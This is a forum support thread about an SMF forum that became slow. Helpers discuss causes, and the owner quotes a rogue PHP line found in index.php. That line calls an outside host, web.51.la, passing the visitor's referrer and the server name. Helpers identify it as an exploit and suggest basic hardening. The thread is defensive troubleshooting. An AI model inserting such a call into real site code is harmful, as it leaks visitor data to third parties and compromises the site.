My SMF Forum Now Incredibly Slow

[pintosal]

Over the past couple of weeks my SMF has become very slow.

Previously it opened in a couple of second, but now it's down to minutes.

My cpanel provider says there's a problem with index.php, but could not be more specific.

I know practically nothing about php, and would appreciate some guidance.

Sorry to be so vague, but I'm no techie.

[Kindred]

what is your site URL?

smf version?
mods installed?

[Sir Osis of Liver]

Attach your index.php.

[Illori]

Attach your index.php.

i really doubt index.php is the cause of the issue since almost all of SMF goes through that one file.

[Sir Osis of Liver]

All of the forum is slow.  Sometimes hosts are correct (not often).  Could be a hack.  No harm in looking.

[Shambles]

^-- after all that, try ticking "Disable hostname lookups" in the server settings of the ACP. Has been known to improve things in some cases...

[JBlaze]

Let's hold off on the theories until OP provides us with a link to their site. Then we can diagnose from there

[pintosal]

Hi

I'm on smf v2.0.11
The site URL is http://www.mtsc.club/archive/index.php
Index.php is attached

[Illori]

i see nothing wrong with your index.php file other then you need to upgrade to 2.0.11.

your footer says you are on 2.0.11, but your file does not match that.

[a10]

Indeed very slow, I'd ask the host (looks like ukwebsolutionsdirect.co.uk) to do some tests into what's going on.
And at the same time, mention this (see attachment) ;O)

[Kindred]

try ticking "Disable hostname lookups" in the server settings of the ACP. Has been known to improve things in some cases...

[Wellwisher]

I did a ping test on ukwebsolutionsdirect.co.uk took 8 seconds to return (site loading after that takes double or even triple that time).  They give UK hosting a bad name. I doubt if it's even running off 32mb ram. It's not an SMF problem.

[Jade Elizabeth]

It's working fine for me. Did you fix the issue?

[pintosal]

For some reason, my index.php had acquired a rogue line, as below, in the body of the file - hacker???

@file_get_contents("[url="http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER'%5D."&vpage=http://".$_SERVER['SERVER_NAME'%5D."/indexs.php""]http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/indexs.php"[/url]);

The support team at the ISP spotted it and commented it out, and now all is well.

As I'm not at all conversant with php I don't know what it was doing.

Thanks for your help

[Colin]

Yes this is an exploit. You should spend some time securing your SMF installation and the server so this doesn't come  back.

Also, if anyone is interested:

http://security.stackexchange.com/questions/66729/what-does-this-javascript-file-do-is-this-a-virus

[pintosal]

Thanks Colin

My cpanel account password is pretty secure, so I'm wondering how anyone could have hacked my account.

There is nothing I can do about the server, as this is under the ISP's control. But what can I do to improve security, especially of the SMF?

[Kindred]

SMF is secure. There are no known vulnerabilities in 2.0.11

That being said...  although we try to check every mod submitted here - mods add code which could, potentially be vulnerable.
Additional scripts running on your site could be vulnerable.

Your best option, in general, is to have your files chmod to 644 and your directories to 755.

[pintosal]

I have no mods.

The attached file shows my current permissions

[Kindred]

Then the hacker either got in through another script running on your site or through some poorly configured other site on your host/server

[Sir Osis of Liver]

That code is not in the index.php you attached.  As Illori pointed out, that's a 2.0.10 file in a 2.0.11 install.  Have you checked your FTP users in cpanel and changed FTP passwords?